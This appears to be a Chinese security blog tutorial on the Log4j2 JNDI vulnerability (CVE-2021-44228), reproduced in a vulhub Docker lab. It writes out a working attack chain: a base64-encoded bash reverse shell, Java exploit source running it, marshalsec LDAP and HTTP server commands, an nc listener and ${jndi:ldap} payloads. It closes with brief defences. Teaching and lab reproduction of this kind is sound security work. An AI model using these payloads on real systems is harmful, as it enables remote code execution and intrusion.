<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="朝闻道 夕死可矣" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="朝闻道 夕死可矣" type="application/atom+xml"><link rel="alternate" type="application/json" title="朝闻道 夕死可矣" href="https://lib0gus.github.io/feed.json"/><link rel="preconnect" href="https://s4.zstatic.net"/><link rel="preconnect" href="https://at.alicdn.com"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CFredericka%20the%20Great:400,400italic,700,700italic%7CNoto%20Serif%20JP:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CInconsolata:400,400italic,700,700italic&display=swap&subset=latin,latin-ext" media="none" onload="this.media&#x3D;&#39;all&#39;"><link rel="modulepreload" href="/js/siteInit.js"></link><link rel="modulepreload" href="/js/nyx-player-X6RTDFRC.js"></link><link rel="modulepreload" href="/js/copy-tex-IZMHKWEC.js"></link><link rel="modulepreload" href="/js/post-HWEJVK45.js"></link><link rel="modulepreload" href="/js/chunk-OAGLLRHQ.js"></link><link rel="modulepreload" href="/js/index.esm-4WN36CR4.js"></link><link rel="modulepreload" href="/js/chunk-RK7HQRIO.js"></link><link rel="modulepreload" href="/js/chunk-MUPCZ7YY.js"></link><link rel="stylesheet" href="/css/siteInit.css" media="none" onload="this.media&#x3D;&#39;all&#39;"></link><link rel="preload" href="../images/1.png" as="image" fetchpriority="high"><meta name="keywords" content="Java安全"/><meta name="description" content="记录学习日常，请犀利点评，指出我的错误"/><link rel="canonical" href="https://lib0gus.github.io/2026/04/01/Java%E5%AE%89%E5%85%A8%E4%B9%8BLog4j2/"><link rel="stylesheet" href="/css/post.css?v=0.5.4"><link rel="stylesheet" href="/css/mermaid.css?v=0.5.4"><!-- 临时处理--><link rel="stylesheet" media="none" onload="this.media='all'" href="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/katex.min.css"><title>Java安全之Log4j2</title><meta name="generator" content="Hexo 8.1.1"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="pagefind_mount"></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">Java安全之Log4j2</h1><div class="meta"><span class="item" title="创建时间：2026-04-01 21:59:12"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2026-04-01T21:59:12+08:00">2026-04-01</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>4k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>4 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">Lib0gus的博客</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><img src="../images/1.png" loading="eager" decoding="async" fetchpriority="high" alt="朝闻道 夕死可矣"></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" data-pagefind-body="data-pagefind-body" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://lib0gus.github.io/2026/04/01/Java%E5%AE%89%E5%85%A8%E4%B9%8BLog4j2/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/test.png"/><meta itemprop="name" content="Lib0gus的小屋"/><meta itemprop="description" content="技术分享 &amp; 生活记录, 记录学习日常，请犀利点评，指出我的错误"/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="朝闻道 夕死可矣"/></span><div class="body md" itemprop="articleBody"><h1 id="什么是log4j2"><a class="anchor" href="#什么是log4j2">#</a> 什么是Log4j2</h1>
<p>顾名思义，log4j2是一个开源的日志库。它是apache下的java应用常见的开源日志库，是一个就Java的日志记录工具。在log4j框架的基础上进行了改进，并引入了丰富的特性，可以控制日志信息输送的目的地为控制台、文件、GUI组建等，被应用于业务系统开发，用于记录程序输入输出日志信息。</p>
<h1 id="为什么会出现该漏洞"><a class="anchor" href="#为什么会出现该漏洞">#</a> 为什么会出现该漏洞</h1>
<p>正常来说，后台捕获一条日志就直接给他当作字符串输出出来了。但是log4j2的lookup方法遇到${}这个格式的字符串会自动去查找并解析执行里面的内容。且日志获取的地方有很多，比如HTTP头、请求参数、登录名等等都有可能被捕获，而且很多应用在默认配置下就会记录这些信息。除了入口多，Log4j2 还被海量 Java 应用、中间件、云服务间接依赖，很多开发者甚至不知道自己用了它。所以它影响范围大，利用难度低，漏洞危害严重。</p>
<p>为什么要设计Lookup功能</p>
<p><strong>核心目的：让日志系统更灵活、更强大，能够在运行时动态获取信息并记录。</strong></p>
<p>在复杂的企业级应用中，日志内容常常需要包含一些运行时信息，例如：</p>
<ul>
<li>当前服务器的 IP 地址</li>
<li>Java 系统属性（<code>java.version</code>）</li>
<li>环境变量（<code>env:USER</code>）</li>
<li>容器或框架的上下文信息</li>
</ul>
<p>如果使用 Lookup，开发者只需在日志配置或代码中写 <code>${java:version}</code>，Log4j2 就会自动填充真实值，<strong>无需在代码中显式获取这些信息</strong>。这降低了代码侵入性，提高了配置的灵活性。</p>
<h1 id="漏洞复现"><a class="anchor" href="#漏洞复现">#</a> 漏洞复现</h1>
<h2 id="环境搭建"><a class="anchor" href="#环境搭建">#</a> 环境搭建</h2>
<p>我们这里使用docker来搭建靶场做演示</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-shell"><span class="line"><span style="color:#998418;--shiki-dark:#B8A965">cd</span><span style="color:#B56959;--shiki-dark:#C98A7D"> vulhub-master/log4j/CVE-2021-44228/</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#80A665">docker-compose</span><span style="color:#B56959;--shiki-dark:#C98A7D"> up</span><span style="color:#A65E2B;--shiki-dark:#C99076"> -d</span></span></code></pre>
<p>我们使用命令来查看靶场地址</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-shell"><span class="line"><span style="color:#59873A;--shiki-dark:#80A665">docker</span><span style="color:#B56959;--shiki-dark:#C98A7D"> ps</span></span></code></pre>
<p><img loading="lazy" src="1775053916450.png" alt="1775053916450" /></p>
<h2 id="攻击复现"><a class="anchor" href="#攻击复现">#</a> 攻击复现</h2>
<p>进入后是一个后台管理的页面</p>
<p><img loading="lazy" src="1775053951713.png" alt="1775053951713" /></p>
<p>我们随便找一个功能点点击后抓包，得到一个数据包如下</p>
<p><img loading="lazy" src="1775054184177.png" alt="1775054184177" /></p>
<p>我们来修改一下action参数使其报错</p>
<p><img loading="lazy" src="1775054223656.png" alt="1775054223656" /></p>
<p>进入靶场日志后台我们可以看到刚才报错的日志，发现1111111被记录了下来。</p>
<p><img loading="lazy" src="1775054261148.png" alt="1775054261148" /></p>
<p>我们可以先使用<a target="_blank" rel="noopener" href="https://www.callback.red/">doslog</a>来检测一下</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-http"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">http://192.168.35.167:8983/solr/admin/cores?_=1775053577222&#x26;action=$</span><span style="color:rgba(255, 18, 18, 0.8);--shiki-dark:rgba(255, 18, 18, 0.8)">{</span><span style="color:#B31D28;--shiki-light-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic">jndi</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B31D28;--shiki-light-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic">ldap:</span><span style="color:#A0ADA0;--shiki-dark:#758575DD">//w1m4.callback.red}&#x26;core=demo&#x26;other=1&#x26;wt=json</span></span></code></pre>
<p>此时成功实现报错，并且我们刚才知道，action里的数据会被日志记录</p>
<p><img loading="lazy" src="1775054431820.png" alt="1775054431820" /></p>
<p>我们查看dnslog服务，发现有一条记录</p>
<p><img loading="lazy" src="1775054451312.png" alt="1775054451312" /></p>
<p>这就说明log4j2的lookup功能成功查找并解析该命令</p>
<h2 id="漏洞利用获取反弹shell"><a class="anchor" href="#漏洞利用获取反弹shell">#</a> 漏洞利用（获取反弹shell）</h2>
<p>我们先编写以下的恶意文件Exploit.java，我们反弹shell监听ip为192.168.35.128的9998端口，因此对应的bash命令为</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-shell"><span class="line"><span style="color:#59873A;--shiki-dark:#80A665">bash</span><span style="color:#A65E2B;--shiki-dark:#C99076"> -i</span><span style="color:#AB5959;--shiki-dark:#CB7676"> </span><span style="color:#AB5959;--shiki-dark:#CB7676">></span><span style="color:#AB5959;--shiki-dark:#CB7676">&#x26;</span><span style="color:#B56959;--shiki-dark:#C98A7D"> /dev/tcp/192.168.35.128/7777</span><span style="color:#AB5959;--shiki-dark:#CB7676"> 0</span><span style="color:#AB5959;--shiki-dark:#CB7676">></span><span style="color:#AB5959;--shiki-dark:#CB7676">&#x26;1</span></span></code></pre>
<p>但是因为命令中的/&lt;&gt;&amp;会被过滤或者编码，容易被拦截。所以我们对命令进行<a target="_blank" rel="noopener" href="https://ares-x.com/tools/runtime-exec">base64编码</a></p>
<p><img loading="lazy" src="1775054845664.png" alt="1775054845664" /></p>
<p>得到命令为</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-shell"><span class="line"><span style="color:#59873A;--shiki-dark:#80A665">bash</span><span style="color:#A65E2B;--shiki-dark:#C99076"> -c</span><span style="color:#B56959;--shiki-dark:#C98A7D"> {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM1LjEyOC83Nzc3IDA+JjE=}</span><span style="color:#AB5959;--shiki-dark:#CB7676">|</span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">base64,-d</span><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">|</span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">bash,-i</span><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span></span></code></pre>
<p>所以我们的恶意文件为Exploit.java</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-java"><span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> java</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">lang</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">Runtime</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> java</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">lang</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">Process</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> class</span><span style="color:#2E8F82;--shiki-dark:#5DA994"> Exploit</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">     public</span><span style="color:#59873A;--shiki-dark:#80A665"> Exploit</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">             try</span><span style="color:#a65e2b;--shiki-dark:#d4976c">{</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">                 Runtime</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">getRuntime</span><span style="color:#a13865;--shiki-dark:#d9739f">(</span><span style="color:#a13865;--shiki-dark:#d9739f">)</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">exec</span><span style="color:#a13865;--shiki-dark:#d9739f">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">/bin/bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM1LjEyOC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#a13865;--shiki-dark:#d9739f">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">                                </span><span style="color:#a65e2b;--shiki-dark:#d4976c">}</span><span style="color:#1E754F;--shiki-dark:#4D9375">catch</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">Exception </span><span style="color:#B07D48;--shiki-dark:#BD976A">e</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#a65e2b;--shiki-dark:#d4976c">{</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">                                            e</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">printStackTrace</span><span style="color:#a13865;--shiki-dark:#d9739f">(</span><span style="color:#a13865;--shiki-dark:#d9739f">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">                                             </span><span style="color:#a65e2b;--shiki-dark:#d4976c">}</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">                </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">         public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> static</span><span style="color:#AB5959;--shiki-dark:#CB7676"> void</span><span style="color:#59873A;--shiki-dark:#80A665"> main</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#AB5959;--shiki-dark:#CB7676">String</span><span style="color:#a65e2b;--shiki-dark:#d4976c">[</span><span style="color:#a65e2b;--shiki-dark:#d4976c">]</span><span style="color:#B07D48;--shiki-dark:#BD976A"> argv</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">                         Exploit</span><span style="color:#B07D48;--shiki-dark:#BD976A"> e</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#1E754F;--shiki-dark:#4D9375"> new</span><span style="color:#59873A;--shiki-dark:#80A665"> Exploit</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">                            </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span></span></code></pre>
<p>对其进行编译（注：此处为了兼容尽量使用jdk版本为1.8）,得到恶意文件</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-powershell"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">javac Exploit.java</span></span></code></pre>
<p>我们将恶意文件放到kali攻击机里，开启一个http服务</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-shell"><span class="line"><span style="color:#59873A;--shiki-dark:#80A665">python</span><span style="color:#A65E2B;--shiki-dark:#C99076"> -m</span><span style="color:#B56959;--shiki-dark:#C98A7D"> http.server</span><span style="color:#2F798A;--shiki-dark:#4C9A91"> 4444</span></span></code></pre>
<p>我们在攻击机里启动LDAP服务</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-shell"><span class="line"><span style="color:#59873A;--shiki-dark:#80A665">java</span><span style="color:#A65E2B;--shiki-dark:#C99076"> -cp</span><span style="color:#B56959;--shiki-dark:#C98A7D"> marshalsec-0.0.3-SNAPSHOT-all.jar</span><span style="color:#B56959;--shiki-dark:#C98A7D"> marshalsec.jndi.LDAPRefServer</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">  "</span><span style="color:#B56959;--shiki-dark:#C98A7D">http://192.168.35.128:4444/#Exploit</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#2F798A;--shiki-dark:#4C9A91"> 1389</span></span></code></pre>
<p>此处的ip地址为http服务的ip地址，端口为http服务的端口。最后的端口为LDAP的端口，自定义即可</p>
<p>随后，我们来监听恶意文件中的端口</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-bash"><span class="line"><span style="color:#59873A;--shiki-dark:#80A665">nc</span><span style="color:#A65E2B;--shiki-dark:#C99076"> -lvnp</span><span style="color:#2F798A;--shiki-dark:#4C9A91"> 7777</span></span></code></pre>
<p><img loading="lazy" src="1775055755353.png" alt="1775055755353" /></p>
<p>最后执行攻击，JNDI注入，我们在使用刚才的漏洞点来构造payload如下</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-http"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">http://192.168.35.167:8983/solr/admin/cores?action=$</span><span style="color:rgba(255, 18, 18, 0.8);--shiki-dark:rgba(255, 18, 18, 0.8)">{</span><span style="color:#B31D28;--shiki-light-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic">jndi</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B31D28;--shiki-light-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic">ldap:</span><span style="color:#A0ADA0;--shiki-dark:#758575DD">//192.168.35.128:1389/Exploit}</span></span></code></pre>
<p>访问该链接，实现报错</p>
<p><img loading="lazy" src="1775055790587.png" alt="1775055790587" /></p>
<p>成功实现反弹shell</p>
<p><img loading="lazy" src="1775055819028.png" alt="1775055819028" /></p>
<p>此时的http服务与LDAP服务日志如下</p>
<p><img loading="lazy" src="1775055853975.png" alt="1775055853975" /></p>
<h1 id="防御措施"><a class="anchor" href="#防御措施">#</a> 防御措施</h1>
<table>
<thead>
<tr>
<th style="text-align:left">设计初衷</th>
<th style="text-align:left">安全缺陷</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">动态获取运行时信息，减少硬编码</td>
<td style="text-align:left">未对输入来源做区分，导致用户输入也能触发 Lookup</td>
</tr>
<tr>
<td style="text-align:left">集成 JNDI 资源，方便企业应用</td>
<td style="text-align:left">默认允许从远程 LDAP/RMI 加载代码，且无任何限制</td>
</tr>
<tr>
<td style="text-align:left">提升配置灵活性，降低维护成本</td>
<td style="text-align:left">忽视了“日志内容可能来自攻击者”的安全边界</td>
</tr>
</tbody>
</table>
<p>所以说，Log4j2 开启 Lookup 功能并非“故意留后门”，而是<strong>当时安全设计理念落后于功能演进的结果</strong>。漏洞爆发后，社区迅速调整了默认安全策略，将便利性置于安全之后，这也是开源软件在安全事件中快速成熟的体现。</p>
<h2 id="1-将-log4j2-升级到安全版本"><a class="anchor" href="#1-将-log4j2-升级到安全版本">#</a> 1、将 Log4j2 升级到安全版本</h2>
<h2 id="2-修改-log4j2-配置文件在日志格式中禁用-lookup"><a class="anchor" href="#2-修改-log4j2-配置文件在日志格式中禁用-lookup">#</a> 2、修改 Log4j2 配置文件，在日志格式中禁用 Lookup</h2>
<h2 id="3-删除-jndi-lookup-类"><a class="anchor" href="#3-删除-jndi-lookup-类">#</a> 3、删除 JNDI Lookup 类</h2>
<h2 id="4-网络层阻断对一些服务进行拦截阻断如ldaprmidns等做好白名单校验"><a class="anchor" href="#4-网络层阻断对一些服务进行拦截阻断如ldaprmidns等做好白名单校验">#</a> 4、网络层阻断，对一些服务进行拦截阻断，如(LDAP\RMI\DNS)等，做好白名单校验</h2>
<div class="tags"><a href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag"><i class="ic i-tag"></i>Java安全</a></div></div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-eye"></i></span><span class="text">总访问量：</span><span class="waline-pageview-count" id="twikoo_visitors" data-path="/2026/04/01/Java安全之Log4j2/">加载中...</span></span><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于 </span><time title="修改时间：2026-04-01 23:15:29" itemprop="dateModified" datetime="2026-04-01T23:15:29+08:00">2026-04-01</time></span></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>Lib0gus的小屋<i class="ic i-at"><em>@</em></i>朝闻道 夕死可矣</li><li class="link"><strong>本文链接：</strong><a href="https://lib0gus.github.io/2026/04/01/Java%E5%AE%89%E5%85%A8%E4%B9%8BLog4j2/" title="Java安全之Log4j2">https://lib0gus.github.io/2026/04/01/Java安全之Log4j2/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2026/04/01/%E8%A7%A3%E5%86%B3hexo%E5%8D%9A%E5%AE%A2%E5%9B%BE%E7%89%87%E6%98%BE%E7%A4%BA%E9%97%AE%E9%A2%98/" rel="prev" itemprop="url" title="解决hexo博客图片显示问题" style="background-image: linear-gradient(to bottom right, #93e692, #9aba8e);"><span class="type">上一篇</span><h3>解决hexo博客图片显示问题</h3></a></div><div class="item right"><a href="/2026/04/02/JNDI%E7%9A%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" rel="next" itemprop="url" title="JNDI的基础知识" style="background-image: linear-gradient(to bottom right, #91d9dd, #ab94b4);"><span class="type">下一篇</span><h3>JNDI的基础知识</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFlog4j2"><span class="toc-number">1.</span> <span class="toc-text"> 什么是Log4j2</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E4%BC%9A%E5%87%BA%E7%8E%B0%E8%AF%A5%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.</span> <span class="toc-text"> 为什么会出现该漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">3.</span> <span class="toc-text"> 漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">3.1.</span> <span class="toc-text"> 环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E5%A4%8D%E7%8E%B0"><span class="toc-number">3.2.</span> <span class="toc-text"> 攻击复现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E8%8E%B7%E5%8F%96%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">3.3.</span> <span class="toc-text"> 漏洞利用（获取反弹shell）</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD"><span class="toc-number">4.</span> <span class="toc-text"> 防御措施</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%B0%86-log4j2-%E5%8D%87%E7%BA%A7%E5%88%B0%E5%AE%89%E5%85%A8%E7%89%88%E6%9C%AC"><span class="toc-number">4.1.</span> <span class="toc-text"> 1、将 Log4j2 升级到安全版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E4%BF%AE%E6%94%B9-log4j2-%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E5%9C%A8%E6%97%A5%E5%BF%97%E6%A0%BC%E5%BC%8F%E4%B8%AD%E7%A6%81%E7%94%A8-lookup"><span class="toc-number">4.2.</span> <span class="toc-text"> 2、修改 Log4j2 配置文件，在日志格式中禁用 Lookup</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E5%88%A0%E9%99%A4-jndi-lookup-%E7%B1%BB"><span class="toc-number">4.3.</span> <span class="toc-text"> 3、删除 JNDI Lookup 类</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E7%BD%91%E7%BB%9C%E5%B1%82%E9%98%BB%E6%96%AD%E5%AF%B9%E4%B8%80%E4%BA%9B%E6%9C%8D%E5%8A%A1%E8%BF%9B%E8%A1%8C%E6%8B%A6%E6%88%AA%E9%98%BB%E6%96%AD%E5%A6%82ldaprmidns%E7%AD%89%E5%81%9A%E5%A5%BD%E7%99%BD%E5%90%8D%E5%8D%95%E6%A0%A1%E9%AA%8C"><span class="toc-number">4.4.</span> <span class="toc-text"> 4、网络层阻断，对一些服务进行拦截阻断，如(LDAP\RMI\DNS)等，做好白名单校验</span></a></li></ol></li></ol></div><div class="related panel pjax" data-title="系列文章"></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="Lib0gus的小屋" src="/assets/test.png"/><p class="name" itemprop="name">Lib0gus的小屋</p><div class="description" itemprop="description">记录学习日常，请犀利点评，指出我的错误</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">10</span><span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">3</span><span class="name">分类</span></a></div><div class="item tags"><a href="/tags/"><span class="count">6</span><span class="name">标签</span></a></div></nav><div class="social"><a target="_blank" rel="noopener" href="https://github.com/Lib0gus" class="item github" title="https:&#x2F;&#x2F;github.com&#x2F;Lib0gus"><i class="ic i-github"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2026/04/02/JNDI%E7%9A%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" rel="prev" 